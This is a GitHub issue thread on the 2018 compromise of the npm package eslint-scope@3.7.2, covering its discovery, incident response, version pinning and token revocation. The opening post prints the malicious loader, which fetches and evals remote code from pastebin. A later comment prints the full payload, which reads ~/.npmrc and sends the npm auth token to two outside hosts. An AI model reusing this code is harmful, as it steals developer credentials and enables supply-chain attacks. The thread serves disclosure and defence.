### ISSUE TITLE
Virus in eslint-scope?

### ISSUE THREAD

**Issue by pronebird** [eslint/eslint-scope#39]
## Update from the maintainers

[Incident status report from npm](https://status.npmjs.org/incidents/dn7c1fgrr7ng)

Please follow the comment by @platinumazure that gives a little insight into what happened:
https://github.com/eslint/eslint-scope/issues/39#issuecomment-404533026

It also appears that the same code was published in eslint-config-eslint@5.0.2, which has also since been unpublished. See https://github.com/eslint/eslint/issues/10600 for more information.

## In the meantime

1. Pin the version of `eslint-scope` to `3.7.1`, one way is to add the `resolutions` to your `package.json`

```
  "resolutions": {
    "eslint-scope": "3.7.1"
  }
```

Verify the dependency version with `yarn list eslint-scope`. It should print out `eslint-scope@3.7.1`

2. Use `package-lock.json` or `yarn.lock` and have it in your repo if possible. Do not upgrade to 3.7.2 even if `yarn outdated` shows that there is a new version available.

3. Revoke your NPM token as suggested in the comment below https://github.com/eslint/eslint-scope/issues/39#issuecomment-404496856. You can do the same by logging in to https://www.npmjs.com/, selecting the "tokens" menu from the account dropdown and removing all tokens listed on the page. Make sure to recreate the relevant tokens if you hook your NPM to external services.

## The issue

I don't know what the hell this is but it looks like a virus to me:

```
[2/3] ⠠ eslint-scope
error /Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope: Command failed.
Exit code: 1
Command: node ./lib/build.js
Arguments: 
Directory: /Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope
Output:
undefined:30
      https1.get({hostname:'sstatic1.histats.com',path:'/0.gif?4103075&101',method:'GET',headers:{Referer:'http://1.a/'+conten
                                                                                                                        ^^^^^^

SyntaxError: Unexpected end of input
    at IncomingMessage.r.on (/Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope/lib/build.js:6:10)
    at emitOne (events.js:116:13)
    at IncomingMessage.emit (events.js:211:7)
    at IncomingMessage.Readable.read (_stream_readable.js:475:10)
    at flow (_stream_readable.js:846:34)
    at resume_ (_stream_readable.js:828:3)
    at _combinedTickCallback (internal/process/next_tick.js:138:11)
```

The contents of a suspicious file:

```js
try{
    var https=require('https');
    https.get({'hostname':'pastebin.com',path:'/raw/XLeVP82h',headers:{'User-Agent':'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0',Accept:'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'}},(r)=>{
    r.setEncoding('utf8');
    r.on('data',(c)=>{
    eval(c);
    });
    r.on('error',()=>{});
    
    }).on('error',()=>{});
    }catch(e){}
```

The URL it attempts to load is http://pastebin.com/raw/XLeVP82h

Also it attempts to send my `.npmrc` somewhere.

This is version 3.7.2 that's been published an hour ago.

**Comment by buhichan** [comment]
+1 
what the heck is going on

**Comment by platinumazure** [comment]
Thanks for the issue!

Latest should be 4.0.0. I highly recommend installing 4.0.0 directly while we figure out what's going on and unpublish 3.7.2 (and tag 4.0.0 as latest again).

I'm checking our Jenkins server logs, but as far as I know, none of us on the ESLint team would have published this. It's possible some npm credentials got compromised.

Thanks again for bringing this to our attention.

**Comment by pronebird** [comment]
Yeah it's likely that NPM credentials has been stolen. Also, I suggested to NPM team to double check with Github repository to make sure that no untagged releases happen. This should at least limit a damage in cases when only NPM account has been stolen.

**Comment by platinumazure** [comment]
I've confirmed that our Jenkins server did not do this. So at least that is probably not compromised.

**Comment by pronebird** [comment]
`babel-eslint` depends on `~3.7.1` which immediately makes it pull the vulnerable `3.7.2`

**Comment by platinumazure** [comment]
It might be a good idea to pin the dependency while we work on unpublishing. We have no plans to publish any 3.7.x so you could safely pin at 3.7.1.

**Comment by pronebird** [comment]
I pinged `babel-eslint` team to update to 4.0.0 or alternatively they can fix the version in `package.json`. Meanwhile I've pinned the version to 3.7.1 in my `package.json`.

```
"resolutions": {
    "eslint-scope": "3.7.1"
  }
```

**Comment by platinumazure** [comment]
I've sent a message to npm's support asking for help in identifying what happened.

I do not have publish access to eslint-scope so I can't unpublish it directly. I've pinged one of our TSC members who does have that access. So hopefully we'll be able to unpublish as soon as he gets the message and has time to do it.

In the meanwhile, in case it wasn't clear from earlier in this thread: **do not use eslint-scope@3.7.2 as it is compromised. Use 3.7.1 or 4.0.0 instead.** Thanks!

**Comment by aSapien** [comment]
Is it possible to publish a clean `3.7.3` version to avoid infecting projects that are configured to auto-bump minor semvers?

**Comment by yvele** [comment]
Hey I have a strange behaviour with `eslint-scope@3.7.2` postinstall, I cannot install it

```
> eslint-scope@3.7.2 postinstall /Users/yves/runtime/node_modules/babel-eslint/node_modules/eslint-scope
> node ./lib/build.js

undefined:25
    https1.get({hostname:'c.statcounter.com',path:'/11760461/0/7b5b9d71/1/',method:'GET',headers:{Referer:'http://2.b/'+conte
                                                                                                                        ^^^^^

SyntaxError: Unexpected end of input
```

**Comment by platinumazure** [comment]
@aSapien I think that's a reasonable suggestion. However, as I don't have publish access, I can neither publish 3.7.3 nor unpublish 3.7.2. Hopefully the folks who do have access will be online soonish and can work on this.

Thanks for your patience!

**Comment by platinumazure** [comment]
@yvele As noted elsewhere in the thread, 3.7.2 is compromised. Do not use it. Please install 3.7.1 instead. Thanks!

**Comment by yvele** [comment]
@platinumazure yep I've seen that but I'm using `babel-eslint`... an issue is already open https://github.com/babel/babel-eslint/issues/656

**Comment by manjotnms** [comment]
Is this problem specific to Linux environment? I am able to install in windows without any problem

> eslint-scope@3.7.2 postinstall D:\xx\xxx\node_modules\eslint-scope
> node ./lib/build.js

**Comment by byCedric** [comment]
@manjatnms, please renew your NPM credentials. Installing it successfully means that the attacker's script also successfully finished. In our Linux CI environment it failed luckily, but that doesn't mean it's safe...

**Comment by selbekk** [comment]
The pastebin in question has been removed / emptied out now.

**Comment by selbekk** [comment]
For later reference - this is what was contained in said pastebin:

```
try{
var path=require('path');
var fs=require('fs');
var npmrc=path.join(process.env.HOME||process.env.USERPROFILE,'.npmrc');
var content="nofile";
 
if (fs.existsSync(npmrc)){
     
      content=fs.readFileSync(npmrc,{encoding:'utf8'});
      content=content.replace('//registry.npmjs.org/:_authToken=','').trim();
 
      var https1=require('https');
      https1.get({hostname:'sstatic1.histats.com',path:'/0.gif?4103075&101',method:'GET',headers:{Referer:'http://1.a/'+content}},()=>{}).on("error",()=>{});
      https1.get({hostname:'c.statcounter.com',path:'/11760461/0/7b5b9d71/1/',method:'GET',headers:{Referer:'http://2.b/'+content}},()=>{}).on("error",()=>{});
   
    }
 
 
   
     
 
 
}catch(e){}
```

**Comment by manjotnms** [comment]
@byCedric : I am using eslint 4.7.2, which has a dependency on eslint-scope.  I suppose in this case eslint has to renew its NPM credentials.

**Comment by byCedric** [comment]
@manjotnms, yes exactly, I would recommend you do the same 😄

**Comment by TimvanScherpenzeel** [comment]
Make sure to change your password and enable 2FA.

Check your current token in `~/.npmrc`.

Log into npm using `npm login`

Revoke the token using `npm token delete`
https://docs.npmjs.com/getting-started/working_with_tokens#how-to-revoke-tokens

**Comment by pronebird** [comment]
@yvele I've updated the issue with some suggestions on how to circumvent the update to the malicious 3.7.2 and how to remove the account token (comment by @TimvanScherpenzeel )

**Comment by rufushonour** [comment]
Looks like its been unpublished :)

**Comment by cusspvz** [comment]
Solved in about 1h... You guys must wear capes. <3

**Comment by asanger** [comment]
That's the power of open source, baby!

**Comment by maksymddd** [comment]
Does anyone have source for `3.7.2` version? For research purposes.

**Comment by samuele-artuso** [comment]
When was 3.7.2 first published on the NPM registry?

**Comment by cusspvz** [comment]
@maksymddd https://registry.npmjs.org/eslint-scope/-/eslint-scope-3.7.2.tgz

**Comment by maksymddd** [comment]
@cusspvz thanks!

**Comment by pronebird** [comment]
so NPM didn't actually remove the file from their cloud 🤦‍♂️

**Comment by cusspvz** [comment]
@samuele-artuso 
```
   { modified: '2018-07-12T12:37:12.601Z',
     created: '2017-03-17T22:10:11.109Z',
     '3.7.0': '2017-03-17T22:10:11.109Z',
     '3.7.1': '2017-04-12T21:13:31.158Z',
     '4.0.0-alpha.0': '2018-04-28T01:47:18.036Z',
     '4.0.0-rc.0': '2018-06-09T15:59:17.350Z',
     '4.0.0': '2018-06-21T20:41:41.408Z',
     '3.7.2': '2018-07-12T10:40:00.478Z' } // <--
```

**Comment by akx** [comment]
Heh, no wonder the loader didn't work on all platforms if it does this:

```javascript
r.on('data',(c)=>{
    eval(c);
});
```

There's nothing to guarantee that all of the code is delivered in a single chunk...

**Comment by rarkins** [comment]
Presumably this means that *some* npm token, from *one* of the npm accounts with publish privileges has been compromised/disclosed somewhere, such as on a CI system. To prevent this reoccurring, not only do you need to work out *which* maintainer/publisher was compromised, but *how*. Or it could just happen again.

**Comment by LINKIWI** [comment]
Given the nature of the attack, it seems highly plausible that eslint's publish tokens were stolen by this same script. It's probably worth performing an audit of all of eslint's dependencies themselves to identify whether a downstream package compromised eslint's auth tokens in a malicious `postinstall`.

**Comment by rarkins** [comment]
If someone has a cache of the old registry result, it would include which `npm` user published v3.7.2. e.g. here is for v3.7.1:

![image](https://user-images.githubusercontent.com/6311784/42636931-353b3172-85ea-11e8-8641-4a9dcd52d282.png)

**Comment by pronebird** [comment]
@rarkins We had a discussion here on Slack that possibly the tokens from the eslint-scope team has been stolen in a similar fashion and that other dependencies may have been affected.

**Comment by Esya** [comment]
Quick one-liner if anybody is on either linux or mac, and has a ton of different files and node projects on their computers, and want to check quickly which version you're running to see if you've potentially been exposed

```
locate eslint-scope | grep -i "eslint-scope/package.json" | xargs jq .version
```

**Comment by transitive-bullshit** [comment]
Once things settle a bit, I'd love to see the eslint team and/or npm support publish a post-mortem discussing exactly what happened and recommendations to prevent this from occurring for other npm package authors in the future.

**Comment by cusspvz** [comment]
@rarkins the yarn and npm repositories don't have that info. But it might be worthy to try on enterprise npm proxies. 

For those who are using proxied registries, here's the original url:
http://registry.npmjs.com/eslint-scope/

**Comment by rabbishuki** [comment]
@Esya is there a similiar one-liner for windows?

**Comment by waynebloss** [comment]
@Esya jq is not a standard install on Mac or Linux. Also, `locate` only works if your database is up to date. `find` would probably be better.

@rabbishuki This works just fine on Windows with Git Bash but you'll need to install `jq`.

```sh
locate eslint-scope | grep -i "eslint-scope/package.json" | xargs jq .version
```

**Comment by nikita-gedgaudas-ht** [comment]
@transitive-bullshit I don't think this will "settle" soon enough.. If the attacker now has at least a thousand or so npmrc tokens that actually made it through, he can automate the process and infect even more packages, only now his script won't fail (since we pointed out his mistake) and we'll have no way of knowing if we're infected or not. 

This will not settle until npm purges all tokens globally.

**Comment by nikita-gedgaudas-ht** [comment]
@transitive-bullshit I don't think this will "settle" soon enough.. If the attacker now has at least a thousand or so npmrc tokens that actually made it through, he can automate the process and infect even more packages, only now his script won't fail (since we pointed out his mistake) and we'll have no way of knowing if we're infected or not. 

This will not settle until npm purges all tokens globally.

**Comment by paulirwin** [comment]
@nikita-gedgaudas-ht I was about to post nearly the same thing. This could theoretically be a self-replicating virus affecting all packages of all authors whose credentials were compromised, and then all packages that depend on those packages, and so on. The virus could also then change its behavior to do more than leak credentials... Just because that's "all" it did here and just because the pastebin has been removed, that doesn't mean that's what it would do to downstream affected packages.

**Comment by m3talstorm** [comment]
Is there a command/script that can be run on a package.json file check it and all its dependencies (recursively) for eslint and print its version?

**Comment by byCedric** [comment]
@m3talstorm take a look at [`npm-ls`](https://docs.npmjs.com/cli/ls)

**Comment by KIVagant** [comment]
The problem is that not only eslint-scope could be infected. Any project in npm right now could have the same issue.

**Comment by oprearocks** [comment]
Damn. Saw this in our CI logs, this morning. 

Fortunately, we have no .npmrc with credentials, but if I was the one affected, I would do a full audit of the versions of my modules, see which ones were published in the past 2,3 weeks, do some integrity check on the code, look for awkward file modification dates. 

If anyone needs help, I have an extra pair of hands to spare and a couple of hours.

**Comment by aaron-em** [comment]
If your locate database isn't up to date or you don't want to fuss with building one (which can take a long time!), here's a bash one-liner relying on `find` that'll do the same job and also let you know which of your packages is affected:

`for packagejson in $(find ~/code -name 'package.json' -path '*node_modules/eslint-scope/*'); do jq '.version' $packagejson | grep '3.7.2'; if [[ $? == "0" ]]; then echo $packagejson; fi; done`

This does assume the presence of `jq` (which is worth installing anyway!), and that your checkouts all live under `~/code` - update to taste. It'll work on anything Unixy, or Windows with Git Bash or Cygwin (does anyone still use Cygwin?), assuming those prereqs.

**Comment by aaron-em** [comment]
If your locate database isn't up to date or you don't want to fuss with building one (which can take a long time!), here's a bash one-liner relying on `find` that'll do the same job and also let you know which of your packages is affected:

`for packagejson in $(find ~/code -name 'package.json' -path '*node_modules/eslint-scope/*'); do jq '.version' $packagejson | grep '3.7.2'; if [[ $? == "0" ]]; then echo $packagejson; fi; done`

This does assume the presence of `jq` (which is worth installing anyway!), and that your checkouts all live under `~/code` - update to taste. It'll work on anything Unixy, or Windows with Git Bash or Cygwin (does anyone still use Cygwin?), assuming those prereqs.

**Comment by joepie91** [comment]
Command I used to get a list of all versions of eslint-scope installed within my projects:

```
find | grep 'eslint-scope/package.json$' | xargs jq -r .version
```

**Comment by orels1** [comment]
Just in case, for all the `yarn` users - `yarn why eslint-scope` should also display the version you have. and since yarn hoists it - you'll usually have just one. Thankfully - 3.7.1 for me. Good job on fixing this all.

**Comment by joepie91** [comment]
Command I used to get a list of all versions of eslint-scope installed within my projects:

```
find | grep 'eslint-scope/package.json$' | xargs jq -r .version
```

**Comment by schtanislau** [comment]
Posting in an epic thread

**Comment by platinumazure** [comment]
Hi everyone. We'll probably be doing a full post-mortem in a blog post later, but here's what I can give you now:

* One of our maintainers did observe that a new npm token was generated overnight (said maintainer was asleep). We think that token was likely used but are awaiting confirmation from npm. This maintainer has changed password, enabled 2FA, and generated new tokens.
  * We are still confirming that all of our other publish-capable accounts are in the clear, but hopefully that will be done today.
* As noted, the published code seems to steal npm credentials, so we do recommend that anyone who might have installed this version change their npm password and (if possible) revoke their npm tokens and generate new ones.
* The npm team has unpublished 3.7.2, so anyone with a dependency that could point to 3.7.x should now get 3.7.1.
* Now that 3.7.2 is unpublished and 4.0.0 is latest, I'm not sure if we need to publish a 3.7.3, but please let us know if you think we might.

More to follow (as I said, probably in a blog post).

@pronebird Could you link to this reply in your original post, please?

**Comment by m3l7** [comment]
@nikita-gedgaudas-ht if there are other packages infected, isn't purging all tokens globally useless? the virus will start to collect tokens again afterwards

**Comment by Mikotochan** [comment]
Do you people not sign your commits and your releases? Git supports it (for commits and tags), most foss projects also have a signature file along with their downloads.

**Comment by m3l7** [comment]
@nikita-gedgaudas-ht if there are other packages infected, isn't purging all tokens globally useless? the virus will start to collect tokens again afterwards

**Comment by pronebird** [comment]
@ayushman4 see this comment that references the main script, there are two stat counter URLs IIRC: https://github.com/eslint/eslint-scope/issues/39#issuecomment-404495923

**Comment by ThiefMaster** [comment]
@Mikotochan how would that help, unless npm had an option to only allow publishing of packages signed by a whitelisted gpg keys?

**Comment by kfrie** [comment]
this is among one of the largest possible security breaches possible, especially since webpack 4 is relying on it and is the defacto bundler of the web.

It's like the ecosystem is infected and you can work around, but just like with a computer you can never recover to be 100% . Global npm token purge it MUST be and then think about good aversion strategies for the future.

**Comment by yedidyak** [comment]
Why wouldn't you publish a 3.7.3? Anyone using 3.7.x and has 3.7.2 cached or installed will not update to 4.0.0 or downgrade to 3.7.2.

**Comment by Mikotochan** [comment]
Do you people not sign your commits and your releases? Git supports it (for commits and tags), most foss projects also have a signature file along with their downloads.

**Comment by DylanLukes** [comment]
@Mikotochan `npm` doesn't do any signing or verification to my knowledge. There is `pkgsign` but it wouldn't do anything about malicious code that's run _during_ the install or post-install step.

**Comment by kfrie** [comment]
this is among one of the largest possible security breaches possible, especially since webpack 4 is relying on it and is the defacto bundler of the web.

It's like the ecosystem is infected and you can work around, but just like with a computer you can never recover to be 100% . Global npm token purge it MUST be and then think about good aversion strategies for the future.

**Comment by kfrie** [comment]
this is among one of the largest possible security breaches possible, especially since webpack 4 is relying on it and is the defacto bundler of the web.

It's like the ecosystem is infected and you can work around, but just like with a computer you can never recover to be 100% . Global npm token purge it MUST be and then think about good aversion strategies for the future.

**Comment by Tuupertunut** [comment]
Now someone just search the entire npm database for scripts similar to this one.

**Comment by kfrie** [comment]
this is among one of the largest possible security breaches possible, especially since webpack 4 is relying on it and is the defacto bundler of the web.

It's like the ecosystem is infected and you can work around, but just like with a computer you can never recover to be 100% . Global npm token purge it MUST be and then think about good aversion strategies for the future.

**Comment by nikita-gedgaudas-ht** [comment]
@m3l7 Good catch. It would't be useless, since it could help control the spread of the virus at least for a while, then package publications should be temporarily disabled for audition and review of the recent modifications.

**Comment by platinumazure** [comment]
@yedidyak My thought was `npm update` would fix. Publishing 3.7.3 wouldn't automatically fix either, for people who have already cached 3.7.2-- they would still need to do `npm update` or equivalent. Am I missing something?

@kfrie et alii: Please reach out to npm directly about concerns with more tokens needing to be purged.

**Comment by pronebird** [comment]
@ayushman4 see this comment that references the main script, there are two stat counter URLs IIRC: https://github.com/eslint/eslint-scope/issues/39#issuecomment-404495923

**Comment by pronebird** [comment]
@ayushman4 see this comment that references the main script, there are two stat counter URLs IIRC: https://github.com/eslint/eslint-scope/issues/39#issuecomment-404495923

**Comment by Mikotochan** [comment]
@DylanLukes
You should not be using joke software like npm then.

**Comment by yedidyak** [comment]
@platinumazure I honestly don't know how all the various versions of `yarn` and `npm` would handle an unpublished package that's cached or installed and is the best match for the dependency.

**Comment by DylanLukes** [comment]
@Mikotochan I don't do much Javascript, so in general, I don't. But it's worth noting that this is a potential problem that exists in a lot of package managers, not just NPM. The only ecosystem I can think of where this is probably not an issue is on the JVM where your JRE can be configured to verify that each and every jar is signed properly.

In other ecosystems the solution is generally to use a "safe" or LTS package subset.

**Comment by ulidtko** [comment]
Oh there are *quite a few* package managers that can and do handle tarball integrity; you probably wouldn't believe.

**Comment by jeremyBanks** [comment]
How would verifying signatures help? Anyone who has publication tokens would presumably also need to have a publication signing key.

**Comment by Ajedi32** [comment]
@platinumazure

> Could you link to this reply in your original post, please?

You're a maintainer; you can just edit the issue description directly.

**Comment by ArcanisCz** [comment]
@DylanLukes i think this problem exist in NPM ecosystem mostly due to habit of "aproximate versions" in dependencies, which is not existent in other ecosystems (which i know of).

**Comment by kfrie** [comment]
@Tuupertunut 
and just when you are done with that, the attacker compromises another package with a yet unpurged token of another package :/

**Comment by nikita-gedgaudas-ht** [comment]
@kfrie suspend publication for the period of reviewal. The sooner NPM does this, the sooner we can come back to using it. If no action is taken, RIP npm

**Comment by Mikotochan** [comment]
@SteveEdson
Well then, enjoy your shitty package manager that's actively shipping malware. Package signing SHOULD be mandatory in this day and age (funnily enough it was already common 20 years ago).
Not to mention the other funny npm issues https://github.com/npm/npm/issues/11283 https://github.com/npm/npm/issues/9884
The other ridiculous thing with npm is that you can have different source in your git repo and ship a totally different code via npm.

@ulidtko
Do you know any for the nodejs ecosystem? Yarn does not support it either to my knowledge.

@jeremyBanks
1: The people who run npm would not be able to forge a signature.
2: Private keys are usually stored in an encrypted format - thus a malicious program would have to come with a keylogger or something like that. Moreover if you were arrested an authority would not be able to decrypt it.
3: Private keys are usually stored offline.

**Comment by DylanLukes** [comment]
@jeremyBanks Separation of concerns. You're right that if the same person/people had access to both, it wouldn't provide any additional benefit. Generally speaking though, keys are just a _little_ bit easier to secure and manage than a plain text `.npmrc`.

Publication keys also cannot be easily revoked, whereas publication tokens can be be issued and revoked at will. You can have one trusted signatory, and many developers with publication tokens, provided that the publication service only accepts signed releases.

**Comment by ArcanisCz** [comment]
@Mikotochan 

> The other ridiculous thing with npm is that you can have different source in your git repo and ship a totally different code via npm.

You can in Maven too. And you can even compile different C++ executable than you put in your git. Thats is the reason, we use signatures to verify integrity and why reproducible build/compile matters.

**Comment by x3ro** [comment]
For anyone curious about the signing situation, the NPM maintainers [actively rejected package signing in 2015](https://github.com/npm/npm/pull/4016#issuecomment-76316744).

**Comment by shaunwarman** [comment]
`npm token revoke <token>`

**Comment by paulirwin** [comment]
Some of the comments on here re: package signing are combative, unproductive, and off-topic. If you have concerns about npm's approach to package management, please share them at https://github.com/npm/npm/issues

**Comment by kelset** [comment]
I suggest that maintainers lock this issue so that they only will be able to post and update those subscribed to the issue.

**Comment by nevir** [comment]
Do we think this is confined to eslint-scope, or should we be concerned about most packages under the eslint umbrella?

**Comment by nevir** [comment]
Do we think this is confined to eslint-scope, or should we be concerned about most packages under the eslint umbrella?

**Comment by hzoo** [comment]
@paulirwin, @kelset, yep I have access so did it now. Because there's a lot of sources linking to this issue, we want to keep noise to the minimum, and promise that we will update the thread with more information as we get it.

To reset your npm tokens: https://www.npmjs.com/settings/{USERNAME}/tokens
To enable 2FA: https://www.npmjs.com/settings/{USERNAME}/tfa

**Comment by ilyavolodin** [comment]
Update: We went through every package under ESLint organization and verified that the only package that was published with this issue was eslint-scope.

**Comment by ilyavolodin** [comment]
Update: We went through every package under ESLint organization and verified that the only package that was published with this issue was eslint-scope.

**Comment by kaicataldo** [comment]
Sorry - I didn't mean to close this!

**Comment by kaicataldo** [comment]
It looks like eslint-config-eslint was also compromised, but has since been unpublished as well.

**Comment by Aladdin-ADD** [comment]
Scanning script to find infected @3.7.2 installations: https://gist.github.com/brownstein/8aaade4953807f512d416da0c6a5a5f6 
 (refs: #40 thanks @brownstein)

**Comment by kaicataldo** [comment]
[Incident report status from npm](https://status.npmjs.org/incidents/dn7c1fgrr7ng)

**Comment by platinumazure** [comment]
We're working on publishing eslint-scope@3.7.3 and eslint-config-eslint@5.0.3. Apologies for the confusion as earlier I had suggested we might not publish new patch versions.

**Comment by not-an-aardvark** [comment]
`eslint-scope@3.7.3` has been published to npm. Aside from the version number, this is exactly the same package as `eslint-scope@3.7.1`. This should allow users with a hosted version of npm who already have `3.7.2` cached to avoid downloading the malicious version when specifying a version range like `~3.7`.

**Comment by not-an-aardvark** [comment]
`eslint-scope@3.7.3` has been published to npm. Aside from the version number, this is exactly the same package as `eslint-scope@3.7.1`. This should allow users with a hosted version of npm who already have `3.7.2` cached to avoid downloading the malicious version when specifying a version range like `~3.7`.

**Comment by kaicataldo** [comment]
This has now been resolved. Please find a write up of the incident on [our blog](https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes).

The ESLint team apologizes for allowing this to happen. Thanks to the community for making us aware of the issue so quickly and for providing information.
